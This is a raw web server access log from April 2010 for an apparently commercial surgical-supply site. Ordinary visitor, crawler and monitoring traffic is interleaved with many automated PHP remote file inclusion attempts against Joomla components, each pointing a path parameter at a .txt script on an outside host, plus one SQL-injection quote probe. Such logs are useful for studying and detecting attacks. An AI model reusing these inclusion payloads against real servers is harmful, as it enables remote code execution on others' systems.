216.121.63.153 - - [07/Apr/2010:07:58:16 -0400] "GET /logs/access_log.Q110031400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:07:57:46 -0400] "GET /logs/access_log.Q109063000 HTTP/1.0" 200 5874408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.221.88.162 - - [07/Apr/2010:07:58:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:58:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:58:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
64.221.88.162 - - [07/Apr/2010:07:58:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6.4)"
217.16.2.167 - - [07/Apr/2010:07:58:52 -0400] "GET /logs/access_log.Q110031400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:58:59 -0400] "GET /logs/access_log.Q110031400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:07:59:02 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L215B485482B37500B53F01W+WSEQ(S0060):1+OUITEM(A0200):45427202 HTTP/1.1" 200 27015 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.225.106.11 - - [07/Apr/2010:07:59:05 -0400] "GET /logs/access_log.Q109052900///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:59:22 -0400] "GET /logs/access_log.Q110020500///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:46 -0400] "GET /logs/error_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:47 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:47 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:49 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:50 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:50 -0400] "GET /logs/error_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:52 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:52 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:52 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:52 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:59:53 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:07:59:53 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:58 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:58 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:59 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:59 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:59 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:59:59 -0400] "GET /logs/error_log.Q110031200//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:00 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:00 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:01 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:01 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:01 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
172.16.1.180 - - [07/Apr/2010:08:00:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:00:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:00:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.121.63.153 - - [07/Apr/2010:08:00:03 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:03 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:05 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:05 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:07 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:16 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:16 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:16 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:08:00:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553C4439008190094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.108.128.242 - - [07/Apr/2010:08:00:29 -0400] "GET /images/_notes/ace_bkgrd_white_r1_c2.jpg.mno HTTP/1.1" 200 254 "-" "Yandex/1.01.001 (compatible; Win16; I)"
86.121.209.94 - - [07/Apr/2010:08:00:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
86.121.209.94 - - [07/Apr/2010:08:00:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
195.206.36.25 - - [07/Apr/2010:08:00:44 -0400] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.biasy.net/pmnl/view.jpg/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:08:00:48 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:08:00:48 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:49 -0400] "GET /logs/access_log.Q110032700%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:53 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:56 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:00:59 -0400] "GET /logs/access_log.Q110032700%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:01:08 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:01:10 -0400] "GET /logs/access_log.Q110032700%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:01:15 -0400] "GET /logs/access_log.Q110022700//errors.php?error=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.168 - - [07/Apr/2010:08:01:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:01:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:01:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.16.2.167 - - [07/Apr/2010:08:01:47 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:08:01:47 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:08:02:07 -0400] "GET /?mosConfig_absolute_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:08:02:07 -0400] "GET /logs/access_log.Q110032100%20%20/?mosConfig_absolute_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.72.242.242 - - [07/Apr/2010:08:02:07 -0400] "GET /logs/?mosConfig_absolute_path=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 200 45236 "-" "Mozilla/5.0"
172.16.1.88 - - [07/Apr/2010:08:02:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [07/Apr/2010:08:02:12 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [07/Apr/2010:08:02:12 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [07/Apr/2010:08:02:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [07/Apr/2010:08:02:13 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.16.2.167 - - [07/Apr/2010:08:02:17 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:08:02:17 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.88 - - [07/Apr/2010:08:02:20 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
202.125.44.136 - - [07/Apr/2010:08:02:28 -0400] "GET /items.php?cid=' HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
172.16.1.168 - - [07/Apr/2010:08:02:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:02:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:02:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.121.63.153 - - [07/Apr/2010:08:02:57 -0400] "GET /logs/access_log.Q110032400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:08:03:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.121.63.153 - - [07/Apr/2010:08:03:25 -0400] "GET /logs/error_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:08:03:25 -0400] "GET /logs/access_log.Q110032200///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:08:03:25 -0400] "GET /logs/access_log.Q109070300///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:08:03:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:08:03:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:08:03:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [07/Apr/2010:08:03:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
172.16.1.180 - - [07/Apr/2010:08:03:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:03:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:08:03:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.121.63.153 - - [07/Apr/2010:08:03:41 -0400] "GET /logs/access_log.Q110032400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:08:03:46 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:03:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
216.121.63.153 - - [07/Apr/2010:08:03:47 -0400] "GET /logs/error_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
64.221.88.162 - - [07/Apr/2010:08:03:58 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.221.88.162 - - [07/Apr/2010:08:03:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.151.217.149 - - [07/Apr/2010:08:04:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.151.217.149 - - [07/Apr/2010:08:04:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
172.16.1.168 - - [07/Apr/2010:08:04:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:04:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [07/Apr/2010:08:04:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.121.63.153 - - [07/Apr/2010:08:04:26 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:27 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:27 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:27 -0400] "GET /logs/access_log.Q110031200%20%20//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:28 -0400] "GET /logs/access_log.Q110031200%20%20//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:28 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:08:04:30 -0400] "GET /logs/access_log.Q108060400 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.121.63.153 - - [07/Apr/2010:08:04:31 -0400] "GET //index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:32 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:04:32 -0400] "GET /logs/access_log.Q110031200%20%20//index.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:04:34 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:04:34 -0400] "GET /logs/error_log.Q109071800%20%20//?_SERVER[DOCUMENT_ROOT]=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:08:04:34 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 200 45241 "-" "Mozilla/5.0"
213.151.217.149 - - [07/Apr/2010:08:04:35 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01402011 HTTP/1.1" 200 45258 "http://acesurgical.com/home.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.151.217.149 - - [07/Apr/2010:08:04:37 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01402011" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.151.217.149 - - [07/Apr/2010:08:04:37 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01402011" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.151.217.149 - - [07/Apr/2010:08:04:37 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01402011" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.151.217.149 - - [07/Apr/2010:08:04:37 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):01402011" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
